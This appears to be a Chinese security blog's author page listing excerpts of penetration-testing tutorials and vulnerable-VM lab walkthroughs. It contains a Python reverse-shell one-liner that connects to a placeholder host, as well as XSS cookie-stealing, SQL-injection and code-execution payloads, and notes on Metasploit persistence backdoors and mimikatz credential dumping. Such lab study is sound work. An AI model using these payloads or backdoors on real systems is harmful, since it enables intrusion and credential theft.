自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(43)
  • 收藏
  • 关注

原创 靶机实战(Super-Mario-Host-v1.0.1)

超级玛丽实验环境实验过程信息收集主机发现端口扫描服务发现目录扫描漏洞发现漏洞利用漏洞发现实验环境靶机:超级玛丽(Super-Mario-Host-v1.0.1)测试机:kali(IP:192.168.186.128),win10实验过程信息收集主机发现netdiscover -I eth0 -r 192.168.186.0/24nmap -sn 192.168.186.0/24arp-scan -l ,arp-scan 192.168.186.0/24端口扫描masscan -p

2020-07-14 16:42:11 544

原创 漏洞复现(cve-2019-0708 RCE)

cve-2019-0708原理漏洞利用:原理CVE-2019-0708漏洞 :是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去,以达到命令执行,或蓝屏。影响系统:windows2003、windows2008、windows2008 R2、windows xp 、win7漏洞利用:msf框架:IP:192.168.186.246 端口开放3389使用scanner/rdp/cve_2019_0708_bluekeep

2020-07-13 23:10:23 646

原创 msfvenom木马生成工具

msfvenom命令命令

2020-07-12 21:50:01 1580

原创 msf后门种植

Meterpreter后门MetsvcPersistenceNCMetsvc无认证,固定31337端口-A :自动启动匹配的利用漏洞/多个/处理程序以连接到服务-r:卸载现有的MeterMeter服务(必须手动删除文件)Persistence通过启动项启动,定期连接,系统启动时回连,自动运行-A:自动启动匹配的利用漏洞/多个/处理程序以连接到代理-S:作为服务启动时自动启动代理(具有系统权限)-U:当用户登录时自动启动代理-L:目标主机中要向其写入负载的位置,如果没有,将使用

2020-07-10 18:40:01 342

原创 mimikatz工具使用

mimikatz使用命令:msf下的mimikatzmimikatz:后渗透工具,从window进程中获取内存,并获取明文密码和NTLM哈希值的工具。kali路径:/usr/share/windows-resources/mimikatz使用将工具移植到靶机中: win32目录下 命令:命令含义::查询帮助信息standard:基础命令命令含义exit退出cls清屏version版本cd切换目录localt

2020-07-10 16:53:51 1242

原创 Metasploit基础

Metasploit模块基础命令:主机扫描端口扫描辅助服务扫描模块ms17-010 永恒之蓝Meterpreter基本命令:模块Auxiliaries (辅助模块):该模块不会直接在测试者和目标主机之间建立访问,它们只负责执行扫描、嗅 探、指纹识别等相关功能以辅助渗透测试Exploit (漏洞利用模块):漏洞利用是指由渗透测试者利用一个系统、应用或者服务中的安全漏洞进行的 攻击行为。Payload (攻击载荷模块 ):攻击载荷是我们期望 目标系统在被渗透攻击之后完成实际攻击功能的代码,成 功渗透目

2020-07-08 22:41:18 254

原创 代码执行漏洞

代码执行漏洞原理相关函数形成原理漏洞防御原理代码执行漏洞是指应用程序本身过滤不严,用户可以通过请求将代码注入到应用中执行。相关函数eval()assert()preg_replace()call_user_func()call_user_func_arrary()arrary_map()动态函数($a($b))可变变量形成原理eval()和assert(), 用于动态执行代码 <?phpassert($_GET['test']);?>preg_re

2020-07-07 23:03:52 377

原创 sqlmap常用命令

sqlmap :设置注入模式:–technique=( B:布尔,E:报错,U:联合查询注入,S:堆叠注入,T:时间注入,Q:内敛查询注入)获取目标方式:sqlmap1.-d 直连数据库. 服务型数据库:sqlmap -d DBMS://SUER:PASSWORD@DBMS_IP:DBMS_POPT/DATABASE NAME(Mysql,Oracle). 文件型数据库:DBMS://DATABASE_FILEPATH(SQLLITE)2.-u url中读取目标3.-l burpui

2020-07-07 16:22:16 257

原创 python3 正则表达式

正则表达式字符匹配一般字符预定义字符数量词边界匹配re模块函数search()sub()findall()re模块修饰符字符匹配一般字符一般字符含义.匹配任意单个字符, a.b 可以的匹配结果为 abc、 aic、 a&c 等, 但不包括换行符\转义字符,把字符改变为原来的意思[…]字符集,相当于在中括号中任选一个。例如 a[bcd],匹配的结果为ab、 ac 和 ad()表示括号的内容作为返回结果预定义字符预定义字符含义

2020-07-05 21:15:48 96

原创 靶机实战(g0rmint)

g0rmint实验环境实验过程信息收集主机发现端口扫描服务发现目录扫描漏洞发现漏洞利用反弹shell提权总结实验环境靶机:g0rmint测试机:kali(IP:192.168.186.128),win10实验过程信息收集主机发现netdiscover -I eth0 -r 192.168.186.0/24nmap -sn 192.168.186.0/24arp-scan -l ,arp-scan 192.168.186.0/24端口扫描服务发现查看web主页,没有主页目录

2020-07-04 18:06:30 259

原创 靶机实战(DC-6)

DC-6实验环境实验过程信息收集主机发现端口扫描服务发现目录扫描漏洞发现漏洞利用提权总结实验环境实验过程信息收集主机发现netdiscover -I eth0 -r 192.168.186.0/24nmap -sn 192.168.186.0/24arp-scan -l ,arp-scan 192.168.186.0/24端口扫描服务发现目录扫描wordpress模板漏洞发现wpscan扫描用户名枚举登录口爆破usr/share/wordlists目录下的rockyou

2020-07-01 22:37:19 149

原创 靶机实战(DC-5)

DC-5实验环境实验过程信息收集主机发现端口扫描服务发现网站指纹目录扫描漏洞发现漏洞利用提权总结实验环境靶机:DC-4测试机:kali(IP:192.168.186.128),win10实验过程信息收集主机发现netdiscover -I eth0 -r 192.168.186.0/24nmap -sn 192.168.186.0/24arp-scan -l ,arp-scan 192.168.186.0/24端口扫描服务发现网站指纹目录扫描dribuster:使用/u

2020-07-01 19:48:12 279

原创 靶机实战(DC-4)

DC-4实验环实验过程信息收集主机发现端口扫描服务发现网站指纹漏洞发现漏洞利用提权总结实验环靶机:DC-4测试机:kali(IP:192.168.186.128),win10实验过程信息收集主机发现netdiscover -I eth0 -r 192.168.186.0/24nmap -sn 192.168.186.0/24arp-scan -l ,arp-scan 192.168.186.0/24端口扫描服务发现网站指纹网站主页漏洞发现尝试爆破kali字典/usr

2020-07-01 19:14:18 157

原创 靶机实战(DC-3)

DC-3实验环境实验过程信息收集主机发现端口扫描服务发现目录扫描漏洞发现漏洞利用提权总结实验环境靶机:DC-3测试机:kali(IP:192.168.186.128),win10实验过程信息收集主机发现netdiscover -I eth0 -r 192.168.186.0/24nmap -sn 192.168.186.0/24arp-scan -l ,arp-scan 192.168.186.0/24端口扫描masscan -p 0-65535 --rate=100000 192

2020-06-30 23:18:39 326

原创 靶机实战(fristileaks)

fristileaks实验环境实验过程信息收集主机发现端口扫描服务扫描目录扫描漏洞发现漏洞利用总结实验环境靶机:fristileaks测试机:kali(IP:192.168.186.128),win10实验过程信息收集主机发现netdiscover -i eth0 -r 192.168.186.0/24nmap -sn 192.168.186.0/24arp-scan -l ,arp-scan 192.168.186.0/24端口扫描masscan -p 0-65535 --rat

2020-06-30 22:44:57 198

原创 靶机实战(DC-2)

DC-2实验环境实验过程主机发现端口扫描目录扫描漏洞发现漏洞利用提权总结实验环境靶机:DC-2测试机:kali(IP:192.168.186.128),win10实验过程主机发现netdiscover -I eth0 -r 192.168.186.0/24nmap -sn 192.168.186.0/24arp-scan -l ,arp-scan 192.168.186.0/24端口扫描masscan -p 0-65535 --rate=100000 192.168.186.248

2020-06-28 16:53:45 262

原创 php代码审计

代码审计基础配置常量定义配置选项基础配置常量定义1.PHP_INI_USER PHP脚本,windows注册表中设置2.PHP_INI_PERDIR php.ini htaccess,httpd.conf中设置3.PHP_INI_SYSTEMphp.ini httpd.conf中设置4.PHP_INI_ALL 任何地方中设置5.php.ini only php

2020-06-03 18:44:55 425

原创 靶场pikachu系列(CSRF,文件下载,目录遍历,XXE,信息泄露)

pikachucsrfgetpostcsrfget登录构造poc<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>error</title></head><body><h1>404</h1><h1>错误</h1><a href="http://192.168.

2020-06-03 12:01:12 500

原创 反弹shell

反弹shellpythonphppython弹出终端python -c 'import pty; pty.spawn("/bin/bash")'python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(

2020-06-02 00:52:55 167

原创 php反序列化漏洞

反序列漏洞原理php反序列化漏洞序列化 serialize()原理序列化:将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送),以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程 通俗点就是把一个对象变成可以传输的字符串反序列化:就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。php反序列化漏洞序列化 serialize()<?php class test{ public $a='aaaa'; public $b='

2020-06-02 00:10:36 100

原创 本地提权

本地提权windowSysinternalsSuite->PsExec.exe利用系统命令进程注入pinjector.exe(隐蔽)fgdumpmimikatzwin缓存密码linux脏牛suid/etc/passwd文件的配置不当sudo组window常见window权限:普通用户:user管理员:administrator系统:systemadmin->systemSysinternalsSuite->PsExec.exe微软发布的一套非常强大的免费工具程序集Ps

2020-06-01 21:51:29 612

原创 靶机实战(DC-1)

DC-1实验环境实验过程信息收集主机发现端口扫描目录扫描网站指纹漏洞发现漏洞利用提权总结实验环境靶机:DC-1测试机:kali(IP:192.168.238.143),win10实验过程信息收集主机发现靶机ip:192.168.238.158端口扫描目录扫描主页面网站指纹searchsploit 搜索网站框架漏洞漏洞发现使用add admin user添加一个用户:abcd :abcd成功登录也可利用msf框架执行命令漏洞利用设置参数拿到一个

2020-06-01 17:48:24 272

原创 靶机实战(billu)

billu实验环境实验过程信息收集主机发现端口扫描目录扫描漏洞发现漏洞利用提权总结实验环境靶机:billu测试机:kali,win10实验过程信息收集主机发现靶机ip:192.168.238.157端口扫描端口:80 常见web漏洞 22 弱口令爆破目录扫描主页面:提示是有sql注入的mysql后台登陆页面漏洞发现test 页面发现任意文件下载找到phpmyadmin的配置文件var/www/phpmy/config.inc.php尝试(ssh,数据库

2020-06-01 01:55:08 455

原创 靶机实战(zico2)

zico2实验环境实验过程信息收集主机发现端口扫描网站指纹目录扫描漏洞发现漏洞利用实验环境靶机:zico2测试机: win10 ,kali实验过程信息收集主机发现靶机IP:192.168.238.156端口扫描网站指纹目录扫描网站主页漏洞发现数据库登录口(弱口令爆破,sql注入,逻辑漏洞等)密码:admin 进到了数据库先看到两个用户尝试解密root:34kroot34zico:zico2215@登陆下ssh(登不进去)searchsploit扫到

2020-05-31 01:51:17 484

原创 靶机实战(node)

node实验环境实验过程信息收集主机发现端口扫描网站指纹目录扫描漏洞发现漏洞利用提权总结:实验环境靶机:node测试机:win10实验过程信息收集主机发现端口扫描网站指纹目录扫描主页面没什么东西换个大字典也没什么东西漏洞发现登录口(爆破,弱口令,SQL注入,逻辑漏洞)看下源:尝试路径漏洞利用提权总结:...

2020-05-30 01:38:51 230

原创 靶场pikachu系列(RCE,文件包含,文件上传,越权)

RCE,文件包含,文件上传,越权RCEexec pingexec eval文件包含localremote文件上传client checkMINI typegetimagesize越权水平越权垂直越权RCEexec ping这里:| ,|| ,& ,&& 都可以看下源码直接拼接防御(白名单):输入拆分,然后校验数字以范围,第一位和第四位1-255,中间两位0-255exec eval也是没做任何过滤文件包含local先试下file协议报错,

2020-05-29 18:19:23 553

原创 靶机实战(Lazysysadmin)

Lazysysadmin实验环境实验过程信息收集主机发现端口扫描网站指纹目录扫描实验环境靶机:Lazysysadmin测试机:kali,win10实验过程信息收集主机发现端口扫描扫到6个端口网站指纹目录扫描访问80找到关键页面/reboots.txt/wordpress用户名信息wordpress默认后台/wordpress/wp-login.php数据库后台/phpmyadmin...

2020-05-29 16:31:08 359

原创 靶场pikachu系列(sql注入)

SQL注入数字型POST字符型GET搜索型注入xx型注入insert/update注入数字型POST判断字段order by 2成功回显payload:联合查询id=1 union select database(),version()%23暴库id=1 union select database(),group_concat(schema_name) from information_schema.schemata%23爆表id=1 union select databas

2020-05-28 23:13:56 1126

原创 靶机实战(bulldog2)

bulldog2实验环境实验过程信息收集1.主机发现2.端口扫描3.目录扫描4.漏洞发现漏洞利用提权总结实验环境靶机:bulldog2测试机:kali,win10实验过程信息收集1.主机发现靶机IP:192.168.238.1492.端口扫描只有80 端口扫描服务,http开启的方法3.目录扫描没有什么有用的东西4.漏洞发现可以用searchsploit搜下nginx漏洞页面发现登录和注册地址,尝试弱口令,爆破,万能密码,逻辑漏洞等注册页面被限制审查元素看一

2020-05-28 18:20:11 419

原创 靶机实战(bulldog)

bulldog实验环境实验过程信息收集1.主机发现2.端口扫描3.目录扫描4.web站指纹5.漏洞发现漏洞利用提权总结实验环境靶机:bulldog测试机:win10 ,kali实验过程信息收集1.主机发现靶机ip:192.168.238.1462.端口扫描先用masscan进行快速全面的扫描nmap扫描得到端口服务信息3.目录扫描访问80,web服务进行目录扫描4.web站指纹以python环境搭建web5.漏洞发现1.尝试ssh弱口令:利用msf,hydra等

2020-05-28 00:58:23 335

原创 靶场pikachu系列(XSS)

XSS反射型get审查元素修改maxlength,payload:<script>alert("a");</script>post登陆后payload:<script>alert("a");</script>利用bp存储型payload:<script>alert(document.cookie);</script>DOM型伪协议payload:javascript:alert(/a/)盲打:将信息提

2020-05-27 19:25:39 135

原创 靶场pikachu系列(爆破)

爆破表单:burp suite:intruder模块设置字典验证码绕过onserver:bp抓包-> repeater模块尝试删掉验证码vcode参数提示验证码不能为空发送后修改密码重复发送依然提示用户密码错误,验证码的重复利用->intruder模块与爆破表单一致绕过验证码onclient:输入验证码抓包->repeater发送尝试删掉vcode参数依然提示用户名密码错误-.>intruder模块爆破token防爆破?:已知用户名利用burp

2020-05-27 17:41:17 541

原创 XXE xml外部实体注入

XML基础:可扩展标记语言,用于传输数据(允许作者自定义自己的标签,和文档结构)构建模块:元素,属性,实体PCDATA:被解析的字符数据CDATA:字符数据(不会被解析器解析)语法规则:1.所有xml 元素必须有关闭标签2.xml 标签对大小写敏感3.xml 必须正确嵌套4.xml 属性必须加引号5.实体引用6.空格会被保留XML元素:指从开始标签到结束标签的部分每个...

2020-04-27 00:34:28 320

原创 webshell,文件上传漏洞

webshell:

2020-04-22 17:25:09 972

原创 ssrf服务器请求伪造

原理:web应用提供提供了从其他服务器获取数据的功能。使用用户指定的url,web应用可以获取图片文件资源。对用户提供url和远端服务器返回的信息没有合适的验证或过滤,产生服务端请求伪造。原理图:危害:1.进行内网的端口扫描2.对内网web应用识别指纹3.攻击内网web应用4.读取文件防御:1.限制协议:仅限http,https2.限制IP:避免应用被用过来获取内网数据,攻击...

2020-04-22 15:52:27 199

原创 文件包含漏洞

原理:可重复使用函数写到单个文件中,在使用某个函数时,直接调用此文件,无需再次编写,这种调用文件的过程为文件包含。被包含的文件设置为变量,来动态调用,导致客户端可以调用任意文件,造成文件包含漏洞。动态包含的参数,web应用没有严格过滤,客户端可以影响或控制文件包含的路径文件包含函数:include() 文件包含失败时,会产生警告,脚本会继续运行。include_once()...

2020-04-21 19:23:02 125

原创 命令执行漏洞

原理:程序员使用脚本语言(比如PHP )开发应用程序过程中,脚本语言开发十分快速、简介,方便,但是也伴随着一些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一些外部程序。当应用需要调用一些外部程序时就会用到一些系统命令的函数。应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入的情况下...

2020-04-21 17:21:06 395

原创 csrf 跨站请求伪造

原理:利用目标用户的合法身份,以目标用户的名义执行某些非法操作。强制终端用户在当前对其进行身份认证后的web应用程序上执行非本意操作(伪造更改状态请求,利用社工诱骗用户执行hacker选择的操作)防御手段1.二次认证2.HTTP referer3.token4.HTTP自定义头利用无防御:POC(get)Referer认证:修改文件名绕过认证token认证:利用b...

2020-04-14 22:39:28 184

原创 XSS 跨站脚本攻击

XSS宽展脚本攻击当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签引入了一段JavaScript脚本时,这些脚本程序就将会在用户浏览器中执行。所以,当这些特殊字符不能被动态页面检查或检查出现失误时,就将会产生XSS漏洞。分类:(1)持久型跨站:最直接的危害类型,跨站代码存储在服务器(数据库)。(2)非持久型跨站:反射型...

2020-04-12 17:52:54 223

原创 sql注入漏洞总结

Mysql

2020-03-29 22:06:13 368

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除